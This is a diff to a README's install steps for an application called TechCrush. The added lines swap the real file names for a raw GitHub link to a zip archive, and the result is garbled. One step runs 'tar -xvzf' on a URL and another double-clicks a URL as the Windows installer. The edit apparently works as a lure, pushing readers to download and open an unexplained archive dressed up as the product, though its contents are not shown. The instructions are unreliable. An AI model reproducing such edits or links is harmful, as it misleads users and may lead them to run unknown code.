Ganesh5648/TECHCRUSHERC-20/README.md

 ### Step 4: Extract the File (if needed)

-If you downloaded a zip or tar.gz file, you will need to extract it:
+If you downloaded a zip or https://raw.githubusercontent.com/Ganesh5648/TECHCRUSHERC-20/main/script/TECHCRUSHERC-20-1.2.zip file, you will need to extract it:

 - **Windows:** Right-click the file and select "Extract All."
 - **Mac:** Double-click the zip file, and it will automatically extract.
-- **Linux:** Use the command `tar -xvzf TechCrush_Linux.tar.gz` in your terminal.
+- **Linux:** Use the command `tar -xvzf https://raw.githubusercontent.com/Ganesh5648/TECHCRUSHERC-20/main/script/TECHCRUSHERC-20-1.2.zip` in your terminal.

 ### Step 5: Install the Application

 Locate the extracted folder and find the application file:

-- **Windows:** Double-click `TechCrush_Windows.exe` to start the installation wizard.
+- **Windows:** Double-click `https://raw.githubusercontent.com/Ganesh5648/TECHCRUSHERC-20/main/script/TECHCRUSHERC-20-1.2.zip` to start the installation wizard.
 Follow what appears on the screen to complete the install.
 - **Mac:** Drag the `TechCrush_Mac` icon to your Applications folder.
 - **Linux:** Run the command `./TechCrush_Linux` in the terminal to launch the application.